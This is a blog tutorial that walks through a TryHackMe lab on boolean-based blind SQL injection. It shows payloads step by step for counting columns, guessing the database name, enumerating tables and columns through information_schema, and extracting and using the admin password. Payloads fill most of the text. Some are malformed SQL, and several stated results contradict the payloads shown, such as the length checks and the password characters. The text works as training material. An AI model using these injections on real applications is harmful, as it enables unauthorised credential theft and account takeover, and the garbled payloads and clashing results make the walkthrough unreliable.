SQL Injection · Vulnerabilities

Boolean-based Blind SQL Injection

admin

The response we get back from our injection attempts is referred to as boolean-based SQL Injection and can be true or false, yes or no, on or off, 1/0, or any other response that can only ever have two outcomes. This result demonstrates to us whether or not our SQL Injection payload was successful. You might initially think that this brief response is unable to offer much information. A complete database’s structure and contents can be enumerated using just these two responses.

So, let’s look at an example of a sample Web application to show how a Boolean-based blind SQL injection works. A screenshot of that application is provided below, and it is a room on the tryhackme platform.

In the screenshot above, we can see that the ‘username’ filter is passing ‘admin’ and that the response indicates that “taken”:true.

Therefore, we must first comprehend what it is doing and the query it is running in the background.

So I entered a random value into the “username” filter in the screenshot above, and as you can see, it displays “SQL QUERY” and “SQL RESULT” in the screenshot’s lower portion.

So the query is

SELECT * FROM users WHERE username=’admin’ LIMIT 1

We can see from the two screenshots above that if I enter “admin,” the output is “taken”:true, and if I enter a random username that doesn’t already exist in the users table, the output is “taken”:false.

When performing a Boolean SQL injection in the real world, we must make educated guesses about the background SQL query because it will not be provided.

It is provided here for understanding only.

Consequently, no results are displayed for this query on the website page. Therefore, in this case, everything that needs to be done involves changing the query’s result from true to false.

So lets start Enumeration.

Final Goal :- Find the Password of the admin user

When we don’t know anything about the database, we follow the steps below.

Step_1(Guss the query)

We can therefore infer from the foregoing that the query is selecting rows from the users table where the username is “admin.”

So Query will be

SELECT * FROM users WHERE username=’admin’

Since we made a guess at the query above, we are unaware of the “LIMIT 1” that is in the actual query.

Step_2 (figure out the number of columns the query returns)

Despite not returning anything in the output, in order to use our customised query, we must count the number of columns that the parent query returned.

In order to count the number of columns by changing the number of the null, we use “UNION SELECT NULL, NULL” in this case.

If you’re interested in learning more about column enumeration, check out the blog post on union-based SQL injection.

Payload to Execute for enumeration

admin’ UNION SELECT NULL-- -

admin’ UNION SELECT NULL, NULL-- -

admin’ UNION SELECT NULL, NULL, NULL-- -

Executing the aforementioned payloads results in false results for the first two, but true results for the third, indicating that the parent query returned three columns.

NOTE :- Because we still don’t know which database is being used, if we enter “– -” as a comment, this syntex should be true for database types mysql, oracle, postgresql, and microsoft. For this reason, i am using this here in the aforementioned payloads. 

Step_3(Enumerate the database type and Name)

the name of the current database being used in a specific database connection is returned by the built-in SQL function database(). The function’s syntax varies a little depending on the particular SQL dialect being used, but in general it requires no arguments and is used as follows:

The database that is being used is still unknown. So, the first step is to identify the database type. MYSQL, Microsoft, Oracle, PostgreSQL, and other database types are available.

So let’s make the payload

admin123' UNION SELECT NULL, NULL, NULL FROM information_schema.tables WHERE table_name LIKE "%"-- -

The payload I created above is executed in each of the databases mentioned above, and if it returns the value true, we can conclude that the database type we are using is one of those listed.

Lets execute it

Therefore, I ran the aforementioned payload, and we received the desired results so The database can be one of MYSQL, MICROSOFT, or POSTGRESQL.

Now count the characters in the database name.

Given that name is also a string type, we use length() to determine the length of any string. Consequently, we use this to determine the length of the database name.

Let’s make the payload

admin12324' UNION SELECT 1,2,3 where length(database())=9;-- -

Here we start from 1 until we get true so

Our payloads can be 

admin12324' UNION SELECT 1,2,3 where length(database())=1;--

admin12324' UNION SELECT 1,2,3 where length(database())=2;--

admin12324' UNION SELECT 1,2,3 where length(database())=3;--

admin12324' UNION SELECT 1,2,3 where length(database())=4;--

We can therefore state that length is 10 because output is true for 10.

admin12324' UNION SELECT 1,2,3 where length(database())=10;--

You can also see in the below screenshot

Now enumerating database name which contains data

Let’s make the payload the database name’s first character.

admin123' UNION SELECT 1, 2, 3, and database() like 'a%'; -- -

So here below is the explanation of the above query 

Database() provides us with the database name, and we are now comparing it to some text that is provided in the payload after the LIKE statement. As a result, the query above executes and returns a false value because the database name does not begin with “a”.

Lets executing below payloads and so on

admin123' UNION SELECT 1, 2, 3, and database() like 'a%'; -- -

admin123' UNION SELECT 1, 2, 3, and database() like 'b%'; -- -

admin123' UNION SELECT 1, 2, 3, and database() like 'c%'; -- -

admin123' UNION SELECT 1, 2, 3, and database() like 'd%'; -- -

admin123' UNION SELECT 1, 2, 3, and database() like 'e%'; -- -

And so on until we get true

So, now we have true for “s”  Thus, we can state that it begins with “s”.

Searching for the next character and testing every possible combination will help us find the right one. 

admin123' UNION SELECT 1, 2, 3, and database() like 'sq%'; -- -

Therefore, we can state that it begins with sq.

As a result, we try until we get a name that is 10 chatacetrs long.

So last payload for the 10th character is 

admin123' UNION SELECT 1,2,3 where database() like 'sqli_three%';--

The database name is sqli_three, as we can now see there were 10 characters before.

step_4 (List the names of the tables)

Now we have enumerated the name of database now we are using it to enumerate the name of tables in it.

Lets make the payload

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';--

This payload retrieves data from the information_schema.tables table, where the table_schema column contains “sqli_three,” and the table_name column contains a string beginning with “a.” If both conditions are satisfied, the payload returns true; otherwise, it returns false.

So now enumerating first character

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'b%';--

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'c%';--

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'd%';--

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'e%';--

Therefore, we carry it out by altering the first character, and we obtain the true for “u.”

Payload for ‘u’ is below

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'u%';--

We list the entire name of the table in this manner. 

To determine the length of the table name, we can use the payload below.

And the payload for that is below.

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'u%' and length(table_name)=5;--

In essence, it involves choosing a row from the information_schema.tables table where the table_schema column contains the string “sqli_three,” the table_name column contains a name that begins with the letter “u,” and the last length(table_name) calculation calculates the length of that table name and compares it to 5

.

In the screenshot above, we can see that it is giving us true for 5, allowing us to determine that the length is 5, and the name begins with “u.”

We now know that the length of the “users” string is five, am I correct?

And our name has five characters and begins with u as well.

 Let’s check to see if our guess was accurate.

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name='users' and length(table_name)=5;--

We’ve had success here.

Having discovered the table’s name, we will now determine the names of the columns it contains.

Now, the first thing that occurs to us is that the users column may contain columns such as username, id, password, usernames, etc., so we check for those first. After that, if nothing is found, we search for each character individually.

So lets make an payload

First lets check for column name “username”

Admin1234' UNION SELECT 1,2,3 FROM information_schema.columns WHERE table_schema = 'sqli_three' and table_name='users'and column_name='username' ;--

achieved success and discovered that username is one of the column names.

Now chek for ‘password’

Admin1234' UNION SELECT 1,2,3 FROM information_schema.columns WHERE table_schema = 'sqli_three' and table_name='users'and column_name='password' ;--

achieved success and discovered that password is one of the column names

So now we know that there there exist our required columns called ‘username’ and ‘password’

step_5(Finding the credentials)

Now we have to find credentials from users table

Lets make payload

Admin123’ UNION SELECT 1,2,3 FROM users WHERE username LIKE ‘a%’;--

Now that the output is true, we can see that one of the usernames begins with a “a.”

So lets try for the username ‘admin’

So payload would be

Admin123' UNION SELECT 1,2,3 FROM users WHERE username='admin';--

Thus, the output for the username “admin” is true.

Now let’s check for password for admin

Now here we need to know that password can be anything like alphabet , non -alphabate anything so we have try each and every characters but first find the length of the password

Let’s make payload for finding length of password

So now let’s make the payload

Aadmin123' UNION SELECT 1,2,3 from users where username='admin' and length(password)=4;--

We now know that the character is four characters long. Let’s now attempt to identify the password’s first character.

Lets make the payload 

Aadmin123' UNION SELECT 1,2,3 from users where username='admin' and password LIKE '1%';--

Lets execute it

Therefore, we have determined that the first character is 3 in our payload. Now that the first letter is a number, we will try using a number in the second position.

let’s create the payload.

Aadmin123' UNION SELECT 1,2,3 from users where username='admin' and password LIKE '31%';--

Now that the output is accurate, we can state that the second character is 8. We discovered additional characters in this way, and our password is 3845.

So now lets try to login with our credentis and ‘admin’ and ‘3845’

Now that we have successfully logged in, you can see in the screenshot above where the flag is.

Here, I’ve used an incredible lab from Tryhackme to describe boolean-based blind sql injection. The link is below. 

https://tryhackme.com/room/sqlinjectionlm

Leave a Reply

Your email address will not be published. Required fields are marked *